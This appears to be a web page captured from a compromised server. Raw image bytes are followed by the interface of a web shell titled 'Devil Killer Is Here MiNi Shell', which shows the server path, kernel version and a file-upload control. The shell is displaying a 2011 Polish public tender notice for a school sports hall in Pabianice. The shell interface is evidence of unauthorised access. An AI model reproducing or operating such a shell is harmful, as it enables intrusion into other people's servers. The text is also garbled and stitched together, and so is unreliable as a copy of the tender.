JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110214/52359-N-2011.html

<p class="kh_header"><b>Pabianice: Budowa hali sportowej wraz z zapleczem przy budynku II Liceum Ogólnokształcącego w Pabianicach</b><br>
<b>Numer ogłoszenia: 52359 - 2011; data zamieszczenia: 14.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Pabianickiego , ul. Piłsudskiego 2, 95-200 Pabianice, woj. łódzkie, tel. 42 22 54 000, faks 042 2159166.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.pabianice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa hali sportowej wraz z zapleczem przy budynku II Liceum Ogólnokształcącego w Pabianicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Budowa hali sportowej wraz z zapleczem przy budynku II Liceum Ogólnokształcącego w Pabianicach. Podstawowy zakres robót:
Zadaniem jest zaprojektowanie i wybudowanie  hali sportowej (Wykonanie projektu budowlanego, uzyskanie niezbędnych uzgodnień i decyzji  administracyjnych, budowa hali w zakresie objętym niniejszą koncepcją z montażem wyposażenia stałego) o wielkości pełnowymiarowego boiska z możliwością przeprowadzenia kwalifikowanych zawodów ligowych w piłce ręcznej, footsal-u, koszykówki, piłki siatkowej, tenisa i innych sportów halowych, wraz z niezbędnym zapleczem oraz możliwością udziału publiczności w ilości 300 osób na trybunie głównej na piętrze. Dla potrzeb imprez okolicznościowych obiekt będzie posiadał maksymalną pojemność do 1490 uczestników jednocześnie wraz z obsługa stałą obiektu. Planowana hala będzie spełniała funkcję zespołu sal gimnastycznych dla szkół ponadpodstawowych, w szczególności II Liceum Ogólnokształcącego im. /Św. Królowej Jadwigi/. Główna sala będzie posiadała możliwość podzielenia jej na trzy odrębne przestrzenie do prowadzenia zajęć lekcyjnych (place A; B i C), rozgradzane za pomocą elektrycznie zsuwanych lub zwijanych do góry kotar wykonanych z elastycznych materiałów niepalnych.
Projektowany budynek posiada wymiary 45,55 x 36,80 (38,70)x11,99m. (wysokość * szerokość * wysokość) i został zlokalizowany szczytem do ulicy Św. Jana, w pierzei ulicy zgodnie z warunkami planu przestrzennego dla miasta Pabianic.
Zgodnie z sugestiami Wojewódzkiego Konserwatora Zabytków elewacje budynku powinny uzyskać architekturę odpowiadającą otoczeniu zabytkowej architektury z przełomu XIX i XX wieku ze szczególną uwagą dla ukształtowania elewacji wschodniej eksponowanej w przestrzeni ulicy Św. Jana.
Projektowany budynek jest skomunikowany projektowanym ciągiem pieszym z II Liceum Ogólnokształcącego. Chodniki będą posiadały bezpośredni dostęp zachodniego chodnika ulicy Św. Jana. 
Zaplanowano układ dostępu do drogi wojewódzkiej nr 485 w postaci odrębnego wjazdu i wyjazdu, rozdzielonych miejscem dla składowania odpadów (śmietnikiem) wraz z zespołem parkingowym składającym się z 34 miejsc parkingowych dla samochodów (w tym dla niepełnosprawnych 5 szt.) oraz zadaszonego stojaka dla rowerów -  (min.10 stanowisk). Na etapie wykonawstwa należy wykonać fundament pod wskazaną przez zamawiającego gotową wiatę, która będzie zakupiona w ramach wyposażenia ruchomego hali sportowej.
Uzupełnieniem planowanej inwestycji będzie ogrodzenie od strony ulicy Św. Jana z dwoma furtkami, dwoma bramami przesuwnymi za pomocą mechanizmów bramowych sterowanych polotami  i śmietnikiem zlokalizowanym na wysepce, przy chodniku i pomiędzy zjazdami z ulicy.
Pozostała część terenu objętego planowaną inwestycją zostanie obsadzona trawą i krzewami iglastymi.
Budynek będzie przygotowany na parterze do obsługi osób niepełnosprawnych w pełnym zakresie.
Projektowana hala posiada, na poziomie piętra trybuny, dla widzów w ilości miejsc siedzących 184 oraz szacunkowo nie mniej niż 107 miejsc stojących. Ponadto na parterze przewidziana jest możliwość oglądania zawodów sportowych dla nie mniej niż 9-rga widzów niepełnosprawnych ruchowo - poruszających się za pomocą wózka inwalidzkiego, co razem daje możliwość obserwowania zawodów sportowych przez trzystu widzów. 
Projektowany budynek jest planowany, jako budynek realizowany w technologiach tradycyjnych mieszanych, przy zastosowaniu, zarówno technologii murarskich, betonów prefabrykowanych i monolitycznych, konstrukcji z drewna oraz stali. Część południowa (zaplecze), to część trzykondygnacyjna niepodpiwniczona, cześć z boiskami jest obiektem jednokondygnacyjnym, niepodpiwniczonym. 
Projektowany budynek jest budynkiem  niskim (N), o kategorii zagrożenia ludzi ZL I, dla której obiekt ma spełniać klasę odporności pożarowej /B/. Woda do zewnętrznego gaszenia pożaru w ilości 20 dm3/s zapewniona będzie z miejskiej sieci hydrantowej w ulicy Św. Jana (lokalizacja dwóch hydrantów ulicznych w odległościach od budynku mniejszej niż 75 m.). Woda do wewnętrznego gaszenia pożaru z hydrantów wewnętrznych fi 25 w ilości 2 dm3/s, zasilanych poprzez stalową instalację wewnętrzną, podłączoną bezpośrednio do zaprojektowanego przyłącza wody. Budynek należy wyposażyć w: przeciwpożarowy wyłącznik prądu,
awaryjne oświetlenie ewakuacyjne, instalację piorunochronną, gaśnice proszkowe 6 kg, oznakowanie znakami rozmieszczonymi według obowiązujących przepisów.
Budynek będzie wyposażony w przyłącza,  instalacje wewnętrzne oraz będzie wyposażony w stałe elementy określone w koncepcji projektowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.25-9, 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 517.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy zaproszeni do składania ofert będą obowiązani wnieść wadium w wysokości: 50.000,00 zł (słownie złotych: pięćdziesiąt tysięcy złotych 00/100). Szczegółowe informacje na temat wniesienia wadium zostaną określone w specyfikacji istotnych warunków zamówienia.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poprzez wykazanie, że wykonawca: wykonał w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwie (2) roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia. Za roboty w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia Zamawiający uważać będzie roboty polegające na budowie budynku nie mieszkalnego o kubaturze nie mniejszej niż 10.000 m3 o wartości robót co najmniej 3000000 zł brutto (słownie: trzy miliony złotych 00/100). (niniejszy warunek stanowi podstawę do ustalenia listy rankingowej zgodnie z zasadami określonymi w pkt IV 1.2 ogłoszenia) Wykaz robót budowlanych należy sporządzić na druku zgodnym z treścią załącznika nr 2 do wniosku o dopuszczenie do udziału w przetargu ograniczonym dostępnym do pobrania na stronie internetowej Starostwa Powiatowego w Pabianicach pod adresem: www.powiat.pabianice.pl</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poprzez wykazanie, że wykonawca: 1. dysponuje co najmniej dwiema (2) osobami posiadającymi razem uprawnienia budowlane do projektowania o specjalności: a) konstrukcyjno-budowlanej bez ograniczeń do sprawowania samodzielnych funkcji technicznych w budownictwie, b) architektonicznej bez ograniczeń do sprawowania samodzielnych funkcji technicznych w budownictwie, c) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń do sprawowania samodzielnych funkcji technicznych w budownictwie, d) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń do sprawowania samodzielnych funkcji technicznych w budownictwie. 2. dysponuje co najmniej jedną (1) osobą posiadająca uprawnienia budowlane do projektowania o specjalności drogowej bez ograniczeń do sprawowania samodzielnych funkcji technicznych w budownictwie, 3. dysponuje co najmniej jedną (1) osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi o specjalności (jedna osoba posiadająca uprawnienia we wszystkich wymienionych niżej specjalnościach lub więcej osób posiadających razem uprawnienia w niżej wymienionych specjalnościach): a) konstrukcyjno-budowlanej bez ograniczeń do sprawowania samodzielnych funkcji technicznych w budownictwie, b) architektonicznej bez ograniczeń do sprawowania samodzielnych funkcji technicznych w budownictwie, c) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń do sprawowania samodzielnych funkcji technicznych w budownictwie, d) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń do sprawowania samodzielnych funkcji technicznych w budownictwie. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia  należy sporządzić na druku zgodnym z treścią załącznika nr 3 do wniosku o dopuszczenie do udziału w przetargu ograniczonym dostępnym do pobrania na stronie internetowej Starostwa Powiatowego w Pabianicach pod adresem: www.powiat.pabianice.pl Ponadto na druku zgodnym z treścią załącznika nr 4 do wniosku o dopuszczenie do udziału w przetargu ograniczonym należy oświadczyć, iż osoby wymienione w wykazie osób uczestniczących w wykonywaniu zamówienia posiadają wymagane uprawnienia określone w ogłoszeniu ( druk jest dostępny do pobrania na stronie internetowej Starostwa Powiatowego w Pabianicach pod adresem: www.powiat.pabianice.pl)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poprzez wykazanie, że wykonawca: posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 2000000,00 zł (słownie: dwa miliony złotych 00/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- oświadczenie o spełnianiu przez wykonawcę warunków określonych w art. 22 ust. 1 ustawy, na druku zgodnym z treścią załącznika nr 1 do wniosku o dopuszczenie do udziału w przetargu ograniczonym dostępnym do pobrania na stronie internetowej Starostwa Powiatowego w Pabianicach pod adresem: www.powiat.pabianice.pl
- oświadczenie o braku podstaw do wykluczenia (wskazanym w pkt. III.4.2 niniejszego ogłoszenia) na druku zgodnym z treścią załącznika nr 5 do wniosku o dopuszczenie do udziału w przetargu ograniczonym dostępnym do pobrania na stronie internetowej Starostwa Powiatowego w Pabianicach pod adresem: www.powiat.pabianice.pl

- wniosek o dopuszczenie do udziału w przetargu ograniczonym na druku zgodnym z treścią dodatku nr 1 do niniejszego ogłoszenia dostępnym do pobrania na stronie internetowej Starostwa Powiatowego w Pabianicach pod adresem: www.powiat.pabianice.pl</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Warunek - wiedza i doświadczenie Wykonawcy oceniany będzie na potrzeby ustalenia listy rankingowej na podstawie wykazu wykonanych robót budowlanych potwierdzających spełnianie warunku udziału w postępowaniu, sporządzonym na druku zgodnym z treścią załącznika nr 2 do wniosku o dopuszczenie do udziału w przetargu ograniczonym wraz z dokumentami potwierdzającymi należyte wykonanie robót, zgodnie z poniższymi zasadami: D= (dz / dzm) x 100 pkt gdzie: D - ilość punktów oferty badanej dz - wiedza i doświadczenie zawodowe badanego wniosku - ilość wykonanych prac o podobnym charakterze i wartości dzm - największe ilościowo wiedza i doświadczenie zawodowe - ilość wykonanych prac o podobnym charakterze i wartości w złożonych wnioskach. Zamawiający przyzna punkty jedynie za usługi, które potwierdzają spełnienie warunku udziału w postępowaniu oraz zawierają dokument potwierdzający, że roboty zostały wykonane należycie. Uwaga. Zamawiający nie wzywa do uzupełnienia dokumentów w trybie art. 26 ust. 3 Pzp jeżeli Wykonawca spełnia warunek udziału w postępowaniu (dotyczy dodatkowych robót zamieszczonych w wykazie wykonanych robót budowlanych). Ocena punktowa wiedzy i doświadczenia Wykonawcy stanowić będzie 100% wagi oceny. Zamawiający zastosuje zaokrąglenie każdego wyniku do dwóch miejsc po przecinku. Tak uzyskane punkty za spełnienie niniejszego warunku stanowić będą o pozycji na liście rankingowej wykonawców. Jeżeli na pozycji piątej listy rankingowej znajdzie się więcej niż jeden Wykonawca do złożenia oferty zaproszony zostanie Wykonawca, dla którego wartość robót budowlanych przedstawionych w wykazie jest największa.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy do treści oferty na podstawie której dokonano wyboru Wykonawcy i określił warunki tych zmian w Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> nie dotyczy<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia będzie dostarczona dla wykonawców zaproszonych do składania ofert..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2011 godzina 10:00, miejsce: Starostwo Powiatowe w Pabianicach Biuro Zarządu Powiatu ul. Piłsudskiego 2, 95-200 Pabianice, budynek A, I piętro, pokój numer 28.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Pisemny wniosek o dopuszczenie do udziału w postępowaniu ograniczonym wraz z załączonym  Oświadczeniem o spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 50 w związku z art. 47 ustawy Prawo zamówień publicznych oraz wszystkimi wymaganymi oświadczeniami i dokumentami potwierdzającymi spełnienie warunków udziału w postępowaniu oraz warunków dotyczących nie podlegania wykluczeniu z postępowania na podstawie art. 24 ustawy - Prawo zamówień publicznych, należy złożyć w miejscu wskazanym w sekcji  IV.4.4)  w opakowaniu uniemożliwiającym zapoznanie się z jego treścią przed upływem terminu składania wniosków. Opakowanie powinno być opatrzone pieczątką lub adnotacją zawierającą nazwę i adres siedziby Wykonawcy oraz posiadać następujący napis Wniosek o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego na /Budowę hali sportowej wraz z zapleczem przy budynku II Liceum Ogólnokształcącego w Pabianicach/ przeprowadzonego w trybie przetargu ograniczonego - sprawa Nr IF.3450-2/P/11;
2. Wniosek i dokumenty należy złożyć w języku polskim. Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski; 
3. Dokumenty mogą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę; 
